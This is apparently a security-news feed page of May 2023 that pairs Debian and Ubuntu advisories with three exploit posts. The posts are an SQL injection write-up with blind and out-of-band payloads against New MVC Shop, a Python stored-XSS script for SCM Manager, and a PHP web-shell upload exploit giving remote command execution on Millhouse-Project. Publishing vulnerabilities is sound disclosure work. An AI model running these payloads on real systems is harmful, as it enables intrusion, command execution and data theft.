Jean-Baptiste Cayrou discovered that the shiftfs file system in the Ubuntu Linux kernel contained a race condition when handling inode locking in some situations. A local attacker could use this to cause a denial of service (kernel deadlock).

CVE-2023-2612: CVE-2023-2612 | Ubuntu

Debian Linux Security Advisory 5415-1 - Two security issues were discovered in LibreOffice, which could potentially result in the execution of arbitrary code when loading a malformed spreadsheet document or unacknowledged loading of linked documents within a floating frame.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5415-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 28, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libreofficeCVE ID         : CVE-2023-0950 CVE-2023-2255Two security issues were discocvered in LibreOffice, which couldpotentially result in the execution of arbitrary code when loading amalformed spreadsheet document or unacknowlegded loading of linkeddocuments within a floating frame.For the stable distribution (bullseye), these problems have been fixed inversion 1:7.0.4-4+deb11u7.We recommend that you upgrade your libreoffice packages.For the detailed security status of libreoffice please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libreofficeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRzchEACgkQEMKTtsN8TjbRrRAAh/7Ahy9I1prBZqnkRKL3JubDmB7+ni9lK1Jmw0wRGVEBFiFOL6wmJXNiHeqXwx/mNv0/PBZGBNsicKAtftv9ixWfWumBKZSWEfPF9wVDwYGBF6xgC8adCcHk4PZ+/DhuNmGoeTJt6FokhkD/AiATR4IhJJLVUwexZV4jMTRyK85JJ4fTkjZnWgk+OkhHMEBMnAIqjWvpS5HapkTuqBvkzNS9+CgZgi03hcSCCdOP4ioGCQt6pHMrpZ0PyOyJukKOR3FO7YMV1U93dcH7wBrMMRilhH6CAXlAVhQz+48A9sXpZN44zYDdEWv6PNrMNhscLXH2bP1JFB2QGh43dMwt+C5VLlWU1BEWHndVE4Juiq5gkBbfCiENXbjSjxt61f1ZxqlMWBGirgePk9p1y0oZj3E0PKgxo8ViCU5ReaRw2LglGzLR+6bgeav52Zk5nJfKQThGKRWbhncXkF0exVtaaJIVw7NGjzPPZqGsIin/XySxBVIljzP1bPi/cW3oW2t81e5uL6ffWM37sM1K0H2E5CQRNvAr0S2L+5AeJa3f1qmzN00pwnmGdLnV/xA0hftn4NWRtdoFbnPTclpyOVH5M3P4D58NY9Hbc+VAQhViWAdt05HnKtKlxU/zq3Sn+qo9IVAtjaD+DiRuhZfXKNaLbP8apQoISsjZnemH0X+HQVM57e-----END PGP SIGNATURE-----

Debian Security Advisory 5415-1

Debian Linux Security Advisory 5412-1 - Several vulnerabilities were discovered in libraw, a library for reading RAW files obtained from digital photo cameras, which may result in denial of service or the execution of arbitrary code if specially crafted files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5412-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoMay 27, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : librawCVE ID         : CVE-2021-32142 CVE-2023-1729Debian Bug     : 1031790 1036281Several vulnerabilities were discovered in libraw, a library for readingRAW files obtained from digital photo cameras, which may result indenial of service or the execution of arbitrary code if speciallycrafted files are processed.For the stable distribution (bullseye), these problems have been fixed inversion 0.20.2-1+deb11u1.We recommend that you upgrade your libraw packages.For the detailed security status of libraw please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/librawFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmRyXNFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0S6ehAAlIVUex5cV2eOg9y4Z4MrXPPEl7DPhsEItBnU6tA0PQLxImblhRY2+bruFw7S3ovXQxOJQRW3CQ7ykRenfERuZXvENJwbauwD4XFAFPOHcs0lEkdAumQ4pEnxczetY/GXvXVqZ5L2LD8SDLrPLO37u5JNZGclVHn+2OkzSPm3rMwvXXPy0uik6PG1dlJBTbAeTm8bCls+TEvcCD3M1EgwqcJ4Cemnd43R4BvLsd8FJWWB41XrbvEtt5s644k3eJ19EkjYJ/lfi2Uu2b6m1crdFt1DSFl1UlGaMWL/Jz+R8OzAYenlY7RRXzZOsMSPlt4B4TUC1AG0WgeZhec4StNDhdQyNZ4ild/2yUqR0cdMLWIHs1Lst+Yr4sKO4BAe75otA93nV49bicwgA+8Sb4nehLZAIm+dUbc+6SmqwntHsfZpSyWTt4FuAH6dM8R6hOAXkQ7DI9x9eod1NLH0FXqcl61qAKrfs348Rd4vPZY5TCndxvSJDuyynDFs9GrYKgN0mN/2ePAgj2Y7CvfUnkoVwK9AeQRETkSLzTwivT+XBc2RUaYRohGARp7DXnoEhtvLUx1Efr1LKXNizT958kpBPvTp3fVf6iP/fW9VtZudbvQb2wBrF7iDe/r4PX2OoYXdbm5qiV7wU20M+YQwZqIva95FQkKxdtPfnYzAWpWMa8g¿zv-----END PGP SIGNATURE-----

Debian Security Advisory 5412-1

Debian Linux Security Advisory 5414-1 - Jose Gomez discovered that the Catalog API endpoint in the Docker registry implementation did not sufficiently enforce limits, which could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5414-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 27, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : docker-registryCVE ID         : CVE-2023-2253Debian Bug     : 1035956Jose Gomez discovered that the Catalog API endpoint in the Dockerregistry implementation did not sufficiently enforce limits, whichcould result in denial of service.For the stable distribution (bullseye), this problem has been fixed inversion 2.7.1+ds2-7+deb11u1.We recommend that you upgrade your docker-registry packages.For the detailed security status of docker-registry please refer toits security tracker page at:https://security-tracker.debian.org/tracker/docker-registryFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRx4msACgkQEMKTtsN8TjZ7fw/9E+dbZBJfuAwWXfAdwAuSE+6aN2Ddqb956wFeT0K+sMaEzhnDthATuJx0cR8K9TfVOcSUbn7bhi/fDxlWMoUL+wN14MxwphZ2udEAgkv052bz97/vAU2bcGNuye081BQWgbdpxm4Y5ioVSyze0y9uixKkBA6grnc9DQoEZz/4cqifxJh5itwFi/AC5TuNzZk4HY7kDrRf/OLZZpZFNloNP9G535FxEdmjR3jTd6scSbEnwmXmuUPUQwo6IfrCLnPRVXY0Vn2Pphb8fK1vsYZrWQpzvBHr4UO/z8F14Pl1AVqQNh0Oct5y/oDhY4MN8n9e5Zsx4lunBczhOS8fGy0gU2ZLK12KTLeTdA1TSZMV6MrkFdYAiWDI6+qP7f8LQi4m1h2HqJX9nm50eEjZ4lfwtK0Xwb0YQEkadpnknbdQM1zkojblFZOjQqq8GQwQQYD+XfIRThZWLz3vA9RhE1MH0/p5JNxfQmm2VG7xdtBdWV5PRtnUtC9KoYQ4wyJjE4AxRbbVbVGoyuoQOCEmMt+MYp68aYjHQD6szT9aGNpyxKdncjHVAVQGdb4cYPAi3m0uObQKsy0q6tDXu+8BhZDoFaFlyy9AtFjPL0mE36FTiLxOmkkJ0Xi4fNlu4Ghq2yiX/lK+xuXjQ+D7SVu6KEuKg8p7ATxIh5k2AmSh6bO7Gz8=vOWz-----END PGP SIGNATURE-----

Debian Security Advisory 5414-1

New MVC Shop version 1.0 suffers from remote SQL injection and missing attribute vulnerabilities.

    ## Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak securityPHPSESSID Hijacking## Author: nu11secur1ty## Date: 05.29.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://portswigger.net/web-security/sql-injection## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\ttq1xmuilflmnv0pcl7cjdwb42avymmdp1koacz.pedal.com\\iqp'))+'was submitted in the User-Agent HTTP header. This payload injects aSQL sub-query that calls MySQL's load_file function with a UNC filepath that references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can retrieve all information from thedatabase of this system.---------------------------------------------------------------------------------------------------------------The following cookie was issued by the application and does not havethe secure flag set:PHPSESSID: The cookie appears to contain a session token, which mayincrease the risk associated with this issue.The malicious user can use one PHPSESSID to connect multiple times onthe system using the same account session.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: User-Agent (User-Agent)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8)Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)' AND (SELECT2825 FROM (SELECT(SLEEP(15)))VKYP)-- kuoe---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/new-mvc-shop-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/new-mvc-shop-10-sqli-samesite-attribute.html)## Time spend:00:35:00

New MVC Shop 1.0 SQL Injection / Missing Attributes

Debian Linux Security Advisory 5411-1 - Multiple issues were found in GPAC multimedia framework, which could result in denial of service or potentially the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5411-1                   security@debian.org  
https://www.debian.org/security/                                  Aron Xu  
May 26, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : gpac  
CVE ID         : CVE-2020-35980 CVE-2021-4043 CVE-2021-21852 CVE-2021-33361   
                 CVE-2021-33363 CVE-2021-33364 CVE-2021-33365 CVE-2021-33366   
                 CVE-2021-36412 CVE-2021-36414 CVE-2021-36417 CVE-2021-40559   
                 CVE-2021-40562 CVE-2021-40563 CVE-2021-40564 CVE-2021-40565   
                 CVE-2021-40566 CVE-2021-40567 CVE-2021-40568 CVE-2021-40569   
                 CVE-2021-40570 CVE-2021-40571 CVE-2021-40572 CVE-2021-40574   
                 CVE-2021-40575 CVE-2021-40576 CVE-2021-40592 CVE-2021-40606   
                 CVE-2021-40608 CVE-2021-40609 CVE-2021-40944 CVE-2021-41456   
                 CVE-2021-41457 CVE-2021-41459 CVE-2021-45262 CVE-2021-45263   
                 CVE-2021-45267 CVE-2021-45291 CVE-2021-45292 CVE-2021-45297   
                 CVE-2021-45760 CVE-2021-45762 CVE-2021-45763 CVE-2021-45764   
                 CVE-2021-45767 CVE-2021-45831 CVE-2021-46038 CVE-2021-46039   
                 CVE-2021-46040 CVE-2021-46041 CVE-2021-46042 CVE-2021-46043   
                 CVE-2021-46044 CVE-2021-46045 CVE-2021-46046 CVE-2021-46047   
                 CVE-2021-46049 CVE-2021-46051 CVE-2022-1035 CVE-2022-1222   
                 CVE-2022-1441 CVE-2022-1795 CVE-2022-2454 CVE-2022-3222   
                 CVE-2022-3957 CVE-2022-4202 CVE-2022-24574 CVE-2022-24577   
                 CVE-2022-24578 CVE-2022-26967 CVE-2022-27145 CVE-2022-27147   
                 CVE-2022-29537 CVE-2022-36190 CVE-2022-36191 CVE-2022-38530   
                 CVE-2022-43255 CVE-2022-45202 CVE-2022-45283 CVE-2022-45343   
                 CVE-2022-47086 CVE-2022-47091 CVE-2022-47094 CVE-2022-47095   
                 CVE-2022-47657 CVE-2022-47659 CVE-2022-47660 CVE-2022-47661   
                 CVE-2022-47662 CVE-2022-47663 CVE-2023-0770 CVE-2023-0818   
                 CVE-2023-0819 CVE-2023-0866 CVE-2023-1448 CVE-2023-1449   
                 CVE-2023-1452 CVE-2023-1654 CVE-2023-2837 CVE-2023-2838   
                 CVE-2023-2839 CVE-2023-2840 CVE-2023-23143 CVE-2023-23144   
                 CVE-2023-23145

Multiple issues were found in GPAC multimedia framework, whcih could result  
in denial of service or potentially the execution of arbitrary code.

For the stable distribution (bullseye), these problems have been fixed in  
version 1.0.1+dfsg1-4+deb11u2.

We recommend that you upgrade your gpac packages.

For the detailed security status of gpac please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/gpac

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmRwutMACgkQO1LKKgqv  
2VQhxgf/aXBHEqvI+O12zLVGiSFBgAgP0WpynhRv+ESync2+EFNBpF/1/w0CAhVr  
mn3NWsUxj21u4Pm9YjfvG7+YXaDTaEqkrgwVknvZKwV6KY42mSEvztWfqTk5xEe1  
Hi7MUL+xKIjUblcgFxNSEAZkb/u9XO3KE7XbPKqNE+FZtz+K95Vtq7CGx+jvpa/F  
Q+e286fsay38RYsI+ESqxe8N5WYljiIph/thot/uawV6vSNYqR1te4wzn//AkDvL  
ADq4Hsr3yQSpDbPEToJwS+Q/Gd4YH7IsqtdSMWdtnrxC6Ri4zSrq+AlOvPe7xM35  
aIUZuLxhqlp6rmBBhNYefgqTiX1vdg==  
=faP5  
-----END PGP SIGNATURE-----

Debian Security Advisory 5411-1

Debian Linux Security Advisory 5413-1 - An issue has been found in sniproxy, a transparent TLS and HTTP layer 4 proxy with SNI support. Due to bad handling of wildcard backend hosts, a crafted HTTP or TLS packet might lead to remote arbitrary code execution.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5413-1                   security@debian.orghttps://www.debian.org/security/                        Thorsten AlteholzMay 26, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : sniproxyCVE ID         : CVE-2023-25076Debian Bug     : 1033752An issue has been found in sniproxy, a transparent TLS and HTTP layer 4proxy with SNI support. Due to bad handling of wildcard backend hosts,a crafted HTTP or TLS packet might lead to remote arbitrary codeexecution.For the stable distribution (bullseye), this problem has been fixed inversion 0.6.0-2+deb11u1.We recommend that you upgrade your sniproxy packages.For the detailed security status of sniproxy please refer toits security tracker page at:https://security-tracker.debian.org/tracker/sniproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmRwsRMACgkQO1LKKgqv2VRavQgAuKHflNXCnnu4VYTdqVME/Gkm37TyaxmrIaWliakXlQcz56ZIVBAdbko4mUgqaWBleXcSXRNe/D+9I8ugQUSVzWXNXqOcu9Z+nQzlpHpB+wQR/rMrC97Ep00NLcEELevoz20uDf6ufU+AQixYyfthvncwKcj0TFp4G4VcQboB5CocCVhlXvqEtimch/M117hfKEsD5AJWY04vXicmCqZWrtEjKUSNkZkrRKT/7u4DTkYcYgYsPBKCT0vPGf2XpWEP0bJb7vRyrPq5BnoLXJclF/t6CqD4L9MtBP1gwHPrtJQmgYdjyWm7wKvKAKXINGSUIYDZKOw/3EEkzL2tHOSxng===0CH/-----END PGP SIGNATURE-----

Debian Security Advisory 5413-1

SCM Manager versions 1.2 through 1.60 suffer from a persistent cross site scripting vulnerability.

    #!/usr/bin/python3# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)# Google Dork: intitle:"SCM Manager" intext:1.60# Date: 05-25-2023# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)# Vendor Homepage: https://scm-manager.org/# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/# Version: 1.2 <= 1.60# Tested on: Debian based# CVE: CVE-2023-33829# Modulesimport requestsimport argparseimport sys# Main menuparser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')parser.add_argument("-u", "--user", help="Admin user or user with write permissions")parser.add_argument("-p", "--password", help="password of the user")args = parser.parse_args()# Credentialsuser = sys.argv[2]password = sys.argv[4]# Global Variablesmain_url = "http://localhost:8080/scm" # Change URL if its necessaryauth_url = main_url + "/api/rest/authentication/login.json"users = main_url + "/api/rest/users.json"groups = main_url + "/api/rest/groups.json"repos = main_url + "/api/rest/repositories.json"# Create a sessionsession = requests.Session()# Credentials to sendpost_data={  'username': user, # change if you have any other user with write permissions  'password': password # change if you have any other user with write permissions}r = session.post(auth_url, data=post_data)if r.status_code == 200:  print("[+] Authentication successfully")else:  print("[-] Failed to authenticate")  sys.exit(1)new_user={  "name": "newUser",  "displayName": "<img src=x onerror=alert('XSS')>",  "mail": "",  "password": "",  "admin": False,  "active": True,  "type": "xml"}create_user = session.post(users, json=new_user)print("[+] User with XSS Payload created")new_group={  "name": "newGroup",  "description": "<img src=x onerror=alert('XSS')>",  "type": "xml"}create_group = session.post(groups, json=new_group)print("[+] Group with XSS Payload created")new_repo={  "name": "newRepo",  "type": "svn",  "contact": "",  "description": "<img src=x onerror=alert('XSS')>",  "public": False}create_repo = session.post(repos, json=new_repo)print("[+] Repository with XSS Payload created")

SCM Manager 1.60 Cross Site Scripting

Debian Linux Security Advisory 5410-1 - Multiple security issues were discovered in Sofia-SIP, a SIP User-Agent library, which could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5410-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 24, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : sofia-sipCVE ID         : CVE-2022-31001 CVE-2022-31002 CVE-2022-31003 CVE-2022-47516                  CVE-2023-22741Multiple security issues were discovered in Sofia-SIP, a SIP User-Agentlibrary, which could result in denial of service.For the stable distribution (bullseye), these problems have been fixed inversion 1.12.11+20110422.1-2.1+deb11u1.We recommend that you upgrade your sofia-sip packages.For the detailed security status of sofia-sip please refer toits security tracker page at:https://security-tracker.debian.org/tracker/sofia-sipFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRt6GUACgkQEMKTtsN8TjbdIg/8DBVsizs1Bi1N65zEHRKfQ4wlq01lNnLMcEECsk/nBd44yZQJL1pudEBiSFmbcF6l4/oeUKvSo5RN1PBe9boVS+tq3ewAUyThZnrywRttFc09Atf3nQyhNaQz3+1SpqW2k6pTwB2+oilRRDITOorOrQM4hgvYxUhmhNmphNTQtEAbZHXYqAb3NaeKTWdKCfEdSthj0t4uOADcpS2XpK4jDR6ymjzPaIoenvYKV6JEVCo0qj1mSh7+K23dmWhV0WoQP2+W0xrZtkDx1SJHPEXfaQ2XXSuBUvyU351XqfWCTxrfBO3h1mlMrkRJmoSdyP9Pikkrm2bBATDjzl0vEpiWWnAtKaglRCJcBpbnIV7c3l2m61kY8osTZrYlKacRROyYUwpK8Q39l5i8shfCa4gbS+eZlQNjkFzTE8gpJDAmJi0FG2YEsN3E1u979AVnMkWMGe5qEYjybVNwl8OOJ/Ksl/sKsHbQ+s3IzSHwPRpSbHRYXIWTkGtJI3KJyyOpmSTdxBKY+YHmqGRhiOON8De+pcIlgn3LrCN92acRtK8vnQstDL+aNCuqUwY7wNiBrj4/JS4V8SuMn6zBeWDfLcbKYf3BLIsskYb6QuqAIssdNYUzCX4v8UTiiy2YuyBY/JDEutSTbn0ygQntur8BGpJiYHat6MffGhsw1knGhimoUkQ==q7se-----END PGP SIGNATURE-----

Debian Security Advisory 5410-1

thrsrossi Millhouse-Project version 1.414 suffers from a remote shell upload vulnerability.

    <?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code ExecutionDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\033[0m\n\n");$target     =  $options['u'];$command    =  $options['c'];$url = $target . '/includes/add_post_sql.php';$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="title"helloworld------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="description"<p>sdsdsds</p>------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="category"1------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="image"; filename="rose.php"Content-Type: application/x-php<?php$shell = shell_exec("' . $command . '");echo $shell;?>------WebKitFormBoundaryzlHN0BEvvaJsDgh8--';$headers = array(    'Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',    'Cookie: PHPSESSID=rose1337',);$ch = curl_init($url);curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);$response = curl_exec($ch);curl_close($ch);// execute command$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);$ch = curl_init($shell);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$exec_shell = curl_exec($ch);curl_close($ch);echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";?>

Tag

#debian